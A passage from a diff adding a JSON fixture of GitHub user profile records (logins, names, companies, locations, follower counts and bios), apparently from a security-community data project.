"collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-06-08T15:29:14Z", + "updated_at": "2023-11-30T18:48:36Z", + "node_id": "U_kgDOBmK4yw", + "bio": "Security Architecture @ Fastly", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 145, + "fields": { + "nest_created_at": "2024-09-11T20:08:50.384Z", + "nest_updated_at": "2024-09-11T20:08:50.805Z", + "name": "Stijn van Houwelingen", + "login": "TeaDrinkingProgrammer", + "email": "teadrinkingprogrammer@proton.me", + "avatar_url": "https://avatars.githubusercontent.com/u/20358521?v=4", + "company": "Avans University of Applied Sciences", + "location": "Breda", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2016-07-08T15:09:40Z", + "updated_at": "2024-08-25T10:54:52Z", + "node_id": "MDQ6VXNlcjIwMzU4NTIx", + "bio": "Student of Computer Science at Avans University of Applied Sciences in Breda, the Netherlands. \r\n\r\nStudent Informatica bij Avans Hogeschool in Breda", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 146, + "fields": { + "nest_created_at": "2024-09-11T20:08:51.199Z", + "nest_updated_at": "2024-09-11T21:18:09.613Z", + "name": "Marco Cald", + "login": "mademarc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81400670?v=4", + "company": "", + "location": "Vancouver, BC Canada", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2021-03-26T03:12:22Z", + "updated_at": "2024-08-14T02:43:23Z", + "node_id": "MDQ6VXNlcjgxNDAwNjcw", + "bio": "A Web Developer /Front End Developer & Ethical hacker/Pentester for the website who enjoys Tech & Responsive Web Designs.", + "is_hireable": true, + "twitter_username": "madmalo777" + } +}, +{ + "model": "github.user", + "pk": 147, + "fields": { + "nest_created_at": "2024-09-11T20:08:53.769Z", + "nest_updated_at": "2024-09-12T03:12:02.720Z", + "name": "Jesse P. Johnson", + "login": "kuwv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6035515?v=4", + "company": "", + "location": "Plano, TX", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 12, + "public_gists_count": 2, + "public_repositories_count": 31, + "created_at": "2013-11-25T22:38:21Z", + "updated_at": "2024-08-13T01:02:33Z", + "node_id": "MDQ6VXNlcjYwMzU1MTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 148, + "fields": { + "nest_created_at": "2024-09-11T20:09:03.790Z", + "nest_updated_at": "2024-09-11T20:09:03.790Z", + "name": "otisthescribe", + "login": "otisthescribe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10553629?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2015-01-15T22:13:16Z", + "updated_at": "2024-08-25T12:10:54Z", + "node_id": "MDQ6VXNlcjEwNTUzNjI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 149, + "fields": { + "nest_created_at": "2024-09-11T20:09:10.208Z", + "nest_updated_at": "2024-09-11T20:09:10.208Z", + "name": "", + "login": "jbaptistemariebio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/146077626?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-26T09:20:16Z", + "updated_at": "2023-09-26T09:20:16Z", + "node_id": "U_kgDOCLT3ug", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 150, + "fields": { + "nest_created_at": "2024-09-11T20:09:13.191Z", + "nest_updated_at": "2024-09-22T19:32:49.218Z", + "name": "Rhite", + "login": "rhite-tech", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/150390331?v=4", + "company": "", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-11-09T20:36:27Z", + "updated_at": "2023-11-13T23:19:49Z", + "node_id": "U_kgDOCPbGOw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 151, + "fields": { + "nest_created_at": "2024-09-11T20:09:22.817Z", + "nest_updated_at": "2024-09-22T19:32:48.264Z", + "name": "Sharan poojari", + "login": "SharanRP", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136159249?v=4", + "company": "", + "location": "Mumbai , India", + "collaborators_count": 0, + "following_count": 48, + "followers_count": 43, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2023-06-10T08:48:28Z", + "updated_at": "2024-09-05T06:28:56Z", + "node_id": "U_kgDOCB2gEQ", + "bio": "GSOC'24 @NumFOCUS, Second Year Information Technology Student at VJTI, Mumbai.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 152, + "fields": { + "nest_created_at": "2024-09-11T20:09:28.705Z", + "nest_updated_at": "2024-09-11T20:09:29.548Z", + "name": "Oliver Schneider", + "login": "exoosh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81239903?v=4", + "company": "exocad GmbH", + "location": "Frankfurt", + "collaborators_count": 0, + "following_count": 80, + "followers_count": 2, + "public_gists_count": 9, + "public_repositories_count": 82, + "created_at": "2021-03-23T12:48:15Z", + "updated_at": "2024-09-11T14:41:58Z", + "node_id": "MDQ6VXNlcjgxMjM5OTAz", + "bio": "This is my account as employee of exocad. @assarbad is my personal account.", + "is_hireable": false, + "twitter_username": "exocad" + } +}, +{ + "model": "github.user", + "pk": 153, + "fields": { + "nest_created_at": "2024-09-11T20:09:29.103Z", + "nest_updated_at": "2024-09-11T20:09:29.103Z", + "name": "Oliver Schneider", + "login": "assarbad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3238620?v=4", + "company": "", + "location": "Frankfurt am Main, Germany", + "collaborators_count": 0, + "following_count": 258, + "followers_count": 54, + "public_gists_count": 4, + "public_repositories_count": 172, + "created_at": "2013-01-10T20:52:00Z", + "updated_at": "2024-09-10T19:33:57Z", + "node_id": "MDQ6VXNlcjMyMzg2MjA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 154, + "fields": { + "nest_created_at": "2024-09-11T20:09:36.611Z", + "nest_updated_at": "2024-09-11T20:09:36.611Z", + "name": "", + "login": "PowerPress", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6321391?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 6, + "public_gists_count": 3, + "public_repositories_count": 459, + "created_at": "2014-01-05T05:13:24Z", + "updated_at": "2024-08-30T00:51:33Z", + "node_id": "MDQ6VXNlcjYzMjEzOTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 155, + "fields": { + "nest_created_at": "2024-09-11T20:09:42.594Z", + "nest_updated_at": "2024-09-22T19:32:36.566Z", + "name": "Dheeraj Singh", + "login": "itsdheerajdp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107138786?v=4", + "company": "IIITDM Kancheepuram", + "location": "Chennai", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 68, + "created_at": "2022-06-08T16:50:05Z", + "updated_at": "2024-09-22T09:41:19Z", + "node_id": "U_kgDOBmLO4g", + "bio": " Full Stack Developer passionate about open-source innovation, crafting cutting-edge solutions one line of code at a time. Let's code for a brighter tomorrow!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 156, + "fields": { + "nest_created_at": "2024-09-11T20:09:45.569Z", + "nest_updated_at": "2024-09-22T19:40:21.921Z", + "name": "Mikael Schirén", + "login": "mikkeschiren", + "email": "mikke.schiren@digitalist.com", + "avatar_url": "https://avatars.githubusercontent.com/u/712838?v=4", + "company": "Digitalist Open Tech", + "location": "Stockholm", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 6, + "public_gists_count": 40, + "public_repositories_count": 70, + "created_at": "2011-04-06T11:32:15Z", + "updated_at": "2024-09-15T11:22:43Z", + "node_id": "MDQ6VXNlcjcxMjgzOA==", + "bio": "Tech Lead @ Digitalist Open Tech Net Services", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 157, + "fields": { + "nest_created_at": "2024-09-11T20:09:47.215Z", + "nest_updated_at": "2024-09-22T19:32:43.681Z", + "name": "Zach Lanier", + "login": "quine", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/126800?v=4", + "company": "", + "location": "Fuquay-Varina, NC", + "collaborators_count": 0, + "following_count": 158, + "followers_count": 215, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2009-09-14T15:40:22Z", + "updated_at": "2024-09-17T00:24:18Z", + "node_id": "MDQ6VXNlcjEyNjgwMA==", + "bio": "Technical Lead Manager, AppSec at Cruise | Wearer of several infosec name tags and hairnets over the last 20+ years", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 158, + "fields": { + "nest_created_at": "2024-09-11T20:09:49.352Z", + "nest_updated_at": "2024-09-22T19:32:44.049Z", + "name": "Michael Evans", + "login": "michaelgrahamevans", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5932424?v=4", + "company": "", + "location": "South Africa", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2013-11-13T19:06:24Z", + "updated_at": "2024-08-21T10:27:24Z", + "node_id": "MDQ6VXNlcjU5MzI0MjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 159, + "fields": { + "nest_created_at": "2024-09-11T20:09:54.038Z", + "nest_updated_at": "2024-09-11T20:09:54.038Z", + "name": "Saverio Turetta", + "login": "save196", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32127070?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2017-09-20T09:26:30Z", + "updated_at": "2024-07-07T14:40:23Z", + "node_id": "MDQ6VXNlcjMyMTI3MDcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 160, + "fields": { + "nest_created_at": "2024-09-11T20:09:59.960Z", + "nest_updated_at": "2024-09-11T20:09:59.960Z", + "name": "Fabian Dellwing", + "login": "fdellwing", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22813377?v=4", + "company": "MB Connect Line GmbH", + "location": "91550 Dinkelsbühl", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2016-10-13T10:12:23Z", + "updated_at": "2024-07-17T11:16:31Z", + "node_id": "MDQ6VXNlcjIyODEzMzc3", + "bio": "Trained systems integration specialist. Currently working as Linux system administrator.", + "is_hireable": false, + "twitter_username": "dellwingf" + } +}, +{ + "model": "github.user", + "pk": 161, + "fields": { + "nest_created_at": "2024-09-11T20:10:04.236Z", + "nest_updated_at": "2024-09-22T19:32:47.011Z", + "name": "", + "login": "ch-lepp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2372415?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2012-09-18T17:40:20Z", + "updated_at": "2024-09-19T09:52:59Z", + "node_id": "MDQ6VXNlcjIzNzI0MTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 162, + "fields": { + "nest_created_at": "2024-09-11T20:10:10.611Z", + "nest_updated_at": "2024-09-16T20:05:19.513Z", + "name": "Sercan Uzun", + "login": "srcnuzn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61967763?v=4", + "company": "ETAS GmbH", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-03-09T09:37:30Z", + "updated_at": "2024-08-26T16:56:48Z", + "node_id": "MDQ6VXNlcjYxOTY3NzYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 163, + "fields": { + "nest_created_at": "2024-09-11T20:10:30.400Z", + "nest_updated_at": "2024-09-13T03:53:49.465Z", + "name": "", + "login": "sszeller", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63561679?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-04-12T20:35:42Z", + "updated_at": "2024-09-10T19:31:01Z", + "node_id": "MDQ6VXNlcjYzNTYxNjc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 164, + "fields": { + "nest_created_at": "2024-09-11T20:10:57.806Z", + "nest_updated_at": "2024-09-22T19:49:29.571Z", + "name": "Raga", + "login": "ragashreeshekar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18080510?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 23, + "public_gists_count": 1, + "public_repositories_count": 51, + "created_at": "2016-03-26T03:56:58Z", + "updated_at": "2024-09-04T14:57:27Z", + "node_id": "MDQ6VXNlcjE4MDgwNTEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 165, + "fields": { + "nest_created_at": "2024-09-11T20:11:30.774Z", + "nest_updated_at": "2024-09-22T20:30:09.121Z", + "name": "Thinh Nguyen", + "login": "ducthinh993", + "email": "ducthinh993@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/58097153?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 81, + "created_at": "2019-11-23T02:48:22Z", + "updated_at": "2024-09-16T12:24:28Z", + "node_id": "MDQ6VXNlcjU4MDk3MTUz", + "bio": "AppSec | DevSecOps | Public Speaker", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 166, + "fields": { + "nest_created_at": "2024-09-11T20:11:33.261Z", + "nest_updated_at": "2024-09-22T18:48:15.671Z", + "name": "Mostafa Moradian", + "login": "mostafa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54546?v=4", + "company": "@gatewayd-io, @grafana", + "location": "Stockholm, Sweden", + "collaborators_count": 0, + "following_count": 360, + "followers_count": 269, + "public_gists_count": 19, + "public_repositories_count": 62, + "created_at": "2009-02-14T17:07:09Z", + "updated_at": "2024-09-19T17:29:37Z", + "node_id": "MDQ6VXNlcjU0NTQ2", + "bio": "SSWE @grafana | Building @gatewayd-io and other cool stuff", + "is_hireable": false, + "twitter_username": "MosiMoradian" + } +}, +{ + "model": "github.user", + "pk": 167, + "fields": { + "nest_created_at": "2024-09-11T20:11:35.340Z", + "nest_updated_at": "2024-09-11T20:11:35.787Z", + "name": "Tuncer", + "login": "TuncerYukler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16542611?v=4", + "company": "Bank of Canada", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2016-01-04T15:38:58Z", + "updated_at": "2024-05-13T16:35:06Z", + "node_id": "MDQ6VXNlcjE2NTQyNjEx", + "bio": "DevSecOps/Application Security Solution Architect", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 168, + "fields": { + "nest_created_at": "2024-09-11T20:11:37.923Z", + "nest_updated_at": "2024-09-11T20:11:37.923Z", + "name": "Whitespots", + "login": "whitespots", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65983771?v=4", + "company": "Whitespots", + "location": "Estonia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2020-05-26T22:21:32Z", + "updated_at": "2024-04-18T17:44:17Z", + "node_id": "MDQ6VXNlcjY1OTgzNzcx", + "bio": "", + "is_hireable": false, + "twitter_username": "whitespots" + } +}, +{ + "model": "github.user", + "pk": 169, + "fields": { + "nest_created_at": "2024-09-11T20:11:39.211Z", + "nest_updated_at": "2024-09-22T19:49:28.009Z", + "name": "", + "login": "sergiomarotco", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29877074?v=4", + "company": "https://avarnis.ru | https://ingos.ru", + "location": "Russia", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 199, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2017-07-04T01:18:16Z", + "updated_at": "2024-09-21T12:23:10Z", + "node_id": "MDQ6VXNlcjI5ODc3MDc0", + "bio": "Security evangelist", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 170, + "fields": { + "nest_created_at": "2024-09-11T20:11:44.212Z", + "nest_updated_at": "2024-09-11T20:11:44.212Z", + "name": "Simon HARVEY", + "login": "irish1986", + "email": "simon.harvey.86@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13018674?v=4", + "company": "Desjardins", + "location": "Canada", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2015-06-23T14:20:41Z", + "updated_at": "2024-09-02T11:29:30Z", + "node_id": "MDQ6VXNlcjEzMDE4Njc0", + "bio": "Dad, devsecops specialist, computer geek, football maniac, dog lover and generally a good dude.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 171, + "fields": { + "nest_created_at": "2024-09-11T20:11:45.072Z", + "nest_updated_at": "2024-09-22T19:23:57.270Z", + "name": "P3", + "login": "peliw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65809224?v=4", + "company": "", + "location": "The Earth!", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-05-23T09:18:27Z", + "updated_at": "2024-08-17T16:10:16Z", + "node_id": "MDQ6VXNlcjY1ODA5MjI0", + "bio": "a people!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 172, + "fields": { + "nest_created_at": "2024-09-11T20:12:11.951Z", + "nest_updated_at": "2024-09-22T16:30:28.845Z", + "name": "", + "login": "Bobberty", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/255876?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2010-04-28T15:01:21Z", + "updated_at": "2023-10-31T21:27:26Z", + "node_id": "MDQ6VXNlcjI1NTg3Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 173, + "fields": { + "nest_created_at": "2024-09-11T20:12:14.459Z", + "nest_updated_at": "2024-09-11T20:12:14.459Z", + "name": "", + "login": "asseco-dklotzmann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/120014088?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-12-07T09:40:48Z", + "updated_at": "2023-03-02T12:34:22Z", + "node_id": "U_kgDOBydFCA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 174, + "fields": { + "nest_created_at": "2024-09-11T20:12:15.478Z", + "nest_updated_at": "2024-09-11T20:12:15.478Z", + "name": "Panda-Network", + "login": "clack1987", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24312164?v=4", + "company": "www.panda-network.cn", + "location": "Suzhou", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2016-12-02T08:07:45Z", + "updated_at": "2023-09-27T05:06:44Z", + "node_id": "MDQ6VXNlcjI0MzEyMTY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 175, + "fields": { + "nest_created_at": "2024-09-11T20:12:16.369Z", + "nest_updated_at": "2024-09-22T16:30:27.221Z", + "name": "", + "login": "TheMinester", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44733031?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-11-03T18:49:27Z", + "updated_at": "2024-09-13T16:09:40Z", + "node_id": "MDQ6VXNlcjQ0NzMzMDMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 176, + "fields": { + "nest_created_at": "2024-09-11T20:13:47.784Z", + "nest_updated_at": "2024-09-22T19:25:12.017Z", + "name": "Cédric Bassem", + "login": "cbassem", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3611704?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-02-16T15:26:03Z", + "updated_at": "2024-08-12T12:06:32Z", + "node_id": "MDQ6VXNlcjM2MTE3MDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 177, + "fields": { + "nest_created_at": "2024-09-11T20:13:50.760Z", + "nest_updated_at": "2024-09-22T19:25:13.637Z", + "name": "cetome", + "login": "cetome", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39617410?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2018-05-25T08:34:32Z", + "updated_at": "2024-08-02T18:01:02Z", + "node_id": "MDQ6VXNlcjM5NjE3NDEw", + "bio": "Independent cyber advisory.\r\n\r\nWe make cyber work.", + "is_hireable": false, + "twitter_username": "cetomeLtd" + } +}, +{ + "model": "github.user", + "pk": 178, + "fields": { + "nest_created_at": "2024-09-11T20:13:54.546Z", + "nest_updated_at": "2024-09-11T20:13:54.546Z", + "name": "Tom Isaacson", + "login": "parsley72", + "email": "parsley72@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1666601?v=4", + "company": "", + "location": "Auckland, New Zealand", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 49, + "created_at": "2012-04-21T20:53:50Z", + "updated_at": "2024-07-17T22:35:22Z", + "node_id": "MDQ6VXNlcjE2NjY2MDE=", + "bio": "", + "is_hireable": true, + "twitter_username": "parsley72" + } +}, +{ + "model": "github.user", + "pk": 179, + "fields": { + "nest_created_at": "2024-09-11T20:13:57.025Z", + "nest_updated_at": "2024-09-22T19:25:12.697Z", + "name": "Théo", + "login": "windBlaze", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7034314?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2014-03-22T21:45:52Z", + "updated_at": "2024-08-13T08:25:52Z", + "node_id": "MDQ6VXNlcjcwMzQzMTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 180, + "fields": { + "nest_created_at": "2024-09-11T20:13:57.853Z", + "nest_updated_at": "2024-09-11T20:13:57.853Z", + "name": "Attila Szász", + "login": "attilaszia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15521680?v=4", + "company": "BugProve", + "location": "Brussels", + "collaborators_count": 0, + "following_count": 284, + "followers_count": 21, + "public_gists_count": 7, + "public_repositories_count": 10, + "created_at": "2015-10-31T12:43:04Z", + "updated_at": "2024-08-26T21:39:47Z", + "node_id": "MDQ6VXNlcjE1NTIxNjgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 181, + "fields": { + "nest_created_at": "2024-09-11T20:14:30.745Z", + "nest_updated_at": "2024-09-22T19:43:13.058Z", + "name": "James Cullum (Pseudonym)", + "login": "JamesCullum", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5477111?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 127, + "public_gists_count": 9, + "public_repositories_count": 29, + "created_at": "2013-09-17T10:21:26Z", + "updated_at": "2024-09-02T21:27:19Z", + "node_id": "MDQ6VXNlcjU0NzcxMTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 182, + "fields": { + "nest_created_at": "2024-09-11T20:14:55.438Z", + "nest_updated_at": "2024-09-22T16:42:25.556Z", + "name": "Andra Lidia Lezza", + "login": "alezza", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6967766?v=4", + "company": "Bulb", + "location": "London", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2014-03-16T17:22:17Z", + "updated_at": "2024-05-15T15:09:27Z", + "node_id": "MDQ6VXNlcjY5Njc3NjY=", + "bio": "Application Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 183, + "fields": { + "nest_created_at": "2024-09-11T20:15:07.213Z", + "nest_updated_at": "2024-09-11T20:15:07.213Z", + "name": "extern-c", + "login": "extern-c", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10775696?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2015-01-30T16:21:39Z", + "updated_at": "2024-09-06T03:24:52Z", + "node_id": "MDQ6VXNlcjEwNzc1Njk2", + "bio": "I am a computer scientist contributing to state-of-the-art research and applications.\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 184, + "fields": { + "nest_created_at": "2024-09-11T20:16:20.992Z", + "nest_updated_at": "2024-09-22T20:24:26.065Z", + "name": "Torsten", + "login": "sslHello", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7883438?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 41, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2014-06-13T19:39:09Z", + "updated_at": "2024-09-06T13:42:57Z", + "node_id": "MDQ6VXNlcjc4ODM0Mzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 185, + "fields": { + "nest_created_at": "2024-09-11T20:16:59.823Z", + "nest_updated_at": "2024-09-22T19:43:21.916Z", + "name": "Paulino Calderon", + "login": "cldrn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/191724?v=4", + "company": "Websec", + "location": "Mexico city", + "collaborators_count": 0, + "following_count": 47, + "followers_count": 671, + "public_gists_count": 5, + "public_repositories_count": 69, + "created_at": "2010-01-28T18:02:45Z", + "updated_at": "2024-08-28T11:20:43Z", + "node_id": "MDQ6VXNlcjE5MTcyNA==", + "bio": "Network/Application security specialist | Open Source contributor | @nmap NSE developer | websec.mx & websec.ca | @pwnlabmx ", + "is_hireable": true, + "twitter_username": "calderpwn" + } +}, +{ + "model": "github.user", + "pk": 186, + "fields": { + "nest_created_at": "2024-09-11T20:17:08.138Z", + "nest_updated_at": "2024-09-11T20:17:08.138Z", + "name": "", + "login": "flip111", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2244480?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 21, + "public_gists_count": 8, + "public_repositories_count": 224, + "created_at": "2012-08-29T22:11:14Z", + "updated_at": "2024-06-10T11:30:28Z", + "node_id": "MDQ6VXNlcjIyNDQ0ODA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 187, + "fields": { + "nest_created_at": "2024-09-11T20:17:08.535Z", + "nest_updated_at": "2024-09-22T19:44:18.681Z", + "name": "Prexy", + "login": "Prakhar-Shankar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97254881?v=4", + "company": "", + "location": "Noida, India", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 54, + "created_at": "2022-01-06T19:51:09Z", + "updated_at": "2024-09-22T08:13:04Z", + "node_id": "U_kgDOBcv94Q", + "bio": "I am a cool-stack developer\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 188, + "fields": { + "nest_created_at": "2024-09-11T20:17:10.288Z", + "nest_updated_at": "2024-09-22T16:36:03.463Z", + "name": "Arya", + "login": "CRImier", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3173633?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 150, + "public_gists_count": 16, + "public_repositories_count": 113, + "created_at": "2013-01-03T01:36:42Z", + "updated_at": "2024-09-11T12:05:55Z", + "node_id": "MDQ6VXNlcjMxNzM2MzM=", + "bio": "", + 